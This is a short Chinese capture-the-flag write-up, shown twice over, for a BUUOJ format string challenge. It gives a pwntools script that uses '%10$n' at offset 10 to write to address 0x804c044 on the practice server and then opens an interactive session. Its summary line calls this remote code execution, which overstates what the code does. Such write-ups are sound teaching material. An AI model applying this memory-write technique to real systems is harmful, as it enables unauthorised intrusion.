存在格式化字符串漏洞

经过尝试发现偏移为10

from pwn import *
addr=0x804c044
p=remote("node3.buuoj.cn",29172)
#%10$n的意思是向偏移为10处所指向的地址处写入已经写的字符数
#即 mov [%10$n] , 字符数
payload=p32(addr)+"%10$n"
p.sendline(payload)
#p32写入的字符数是4
p.sendline("4")
p.interactive()
本文介绍了一种利用格式化字符串漏洞的方法,通过向指定偏移地址写入特定数值来实现远程代码执行。示例中使用Python的pwntools库连接到远程服务器并发送构造好的payload。
存在格式化字符串漏洞

经过尝试发现偏移为10

from pwn import *
addr=0x804c044
p=remote("node3.buuoj.cn",29172)
#%10$n的意思是向偏移为10处所指向的地址处写入已经写的字符数
#即 mov [%10$n] , 字符数
payload=p32(addr)+"%10$n"
p.sendline(payload)
#p32写入的字符数是4
p.sendline("4")
p.interactive()
961
1139
349
577

被折叠的 条评论
为什么被折叠?